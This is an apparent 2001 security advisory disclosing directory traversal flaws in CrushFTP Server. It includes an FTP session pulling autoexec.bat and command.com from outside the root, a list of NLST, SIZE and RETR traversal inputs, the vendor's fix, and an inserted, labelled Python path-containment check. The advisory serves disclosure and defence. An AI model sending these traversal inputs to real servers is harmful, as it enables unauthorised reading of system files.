From: joetesta@HUSHMAIL.COM
Date: Thu May 03 2001 - 16:13:40 CDT


    Vulnerabilities in CrushFTP Server

        Overview

    CrushFTP Server 2.1.4 is a Java FTP server available from
    http://www.crushftp.com. Multiple directory traversal vulnerabilities
    allow logged-in users to change directories outside of the FTP root
    and download files from there.

        Details

    The following session illustrates the problem. The FTP root used was
    "c:\directory\directory".

    >ftp localhost
    Connected to xxxxxxxxxx.rh.rit.edu.
    220-Welcome to CrushFTP!
    220 CrushFTP Server Ready.
    User (xxxxxxxxxx.rh.rit.edu:(none)): jdog
    331 Username OK. Need password.
    Password:
    230-Welcome!
    230 Password OK. Connected.
    ftp> get ../../autoexec.bat
    200 PORT command successful. 127.0.0.1:1868
    150 Opening ASCII mode data connection for ../../autoexec.bat (419 bytes).
    226-Download File Size:419 bytes 0K/sec.
    226 Transfer complete.
    ftp: 419 bytes received in 0.00Seconds 419000.00Kbytes/sec.
    ftp> cd ...
    250 "/.../" CWD command successful.
    ftp> get command.com
    200 PORT command successful. 127.0.0.1:1870
    150 Opening ASCII mode data connection for command.com (93890 bytes).
    226-Download File Size:93890 bytes 92K/sec.
    226 Transfer complete.
    ftp: 94570 bytes received in 1.86Seconds 50.84Kbytes/sec.

    The vendor issued two versions since I made initial contact to address
    additional variations. The following is a list of vulnerabilities which
    affected these intermediate versions (v2.1.5, v2.1.6):

    NLST ..
    NLST ...
    SIZE /../../
    SIZE /.../
    NLST \..\
    NLST /../
    NLST \...\
    RETR \..\.\..\autoexec.bat
    RETR ./\...\autoexec.bat
    RETR .\.\..\..\autoexec.bat
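Added example (not part of the advisory or of CrushFTP): a path containment check that maps an FTP client path onto a virtual root and rejects every traversal variant listed above. It uses pure string handling so the outcome is identical on any OS; the function name and the virtual-root model are assumptions for illustration.

```python
import re
from typing import Optional

# Windows accepts both '/' and '\' as separators, so a check that only
# looks at one of them can be bypassed with the other.
_SEP = re.compile(r"[\\/]+")


def resolve_ftp_path(cwd: str, requested: str) -> Optional[str]:
    """Map a client-supplied path onto the virtual root.

    cwd       -- current virtual directory, e.g. "/pub"
    requested -- the argument of CWD/RETR/NLST/SIZE as sent by the client
    Returns the normalised virtual path ("/a/b") or None when the request
    would leave the root and must be refused.
    """
    # Absolute requests restart at the root; relative ones start at cwd.
    if requested[:1] in ("/", "\\"):
        base = []
    else:
        base = [seg for seg in _SEP.split(cwd) if seg]

    for seg in _SEP.split(requested):
        if seg in ("", "."):
            continue                      # empty or "." segments are no-ops
        if seg == "..":
            if not base:
                return None               # would climb above the root
            base.pop()
            continue
        if seg.strip(".") == "":
            # "...", "...." etc.: the advisory's transcript shows "cd ..."
            # climbing out of the root, so all-dot segments beyond ".."
            # are refused outright instead of being interpreted.
            return None
        base.append(seg)
    return "/" + "/".join(base)


def real_path(ftp_root: str, cwd: str, requested: str) -> Optional[str]:
    """Join the virtual path onto the on-disk root, or None if refused."""
    vpath = resolve_ftp_path(cwd, requested)
    if vpath is None:
        return None
    return ftp_root.rstrip("\\/") + vpath.replace("/", "\\")


if __name__ == "__main__":
    # Constructed inputs: the variants from the advisory against a root of
    # c:\directory\directory. Each should come back as None (refused).
    for arg in ("../../autoexec.bat", "...", "\\..\\.\\..\\autoexec.bat",
                "./\\...\\autoexec.bat", ".\\.\\..\\..\\autoexec.bat"):
        print(repr(arg), "->", real_path("c:\\directory\\directory", "/", arg))
```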

        Solution

    Upgrade to v2.1.7 at:
    http://www.crushftp.com

        Vendor Status

    The program author, Ben Spink, was contacted via <spinkbmac.com> on
    Friday, April 20, 2001. I would like to thank him for taking this
    matter seriously and showing extra effort to resolve these problems.

        - Joe Testa

    e-mail: joetesta@hushmail.com
    web page: http://hogs.rit.edu/~joet
    AIM: LordSpankatron

